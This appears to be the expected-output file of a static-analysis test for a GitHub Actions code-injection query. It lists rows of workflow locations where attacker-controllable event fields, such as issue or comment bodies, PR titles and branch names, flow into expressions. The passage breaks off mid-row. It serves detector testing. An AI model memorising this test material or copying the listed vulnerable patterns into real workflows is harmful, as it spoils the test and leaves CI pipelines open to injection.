.github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | 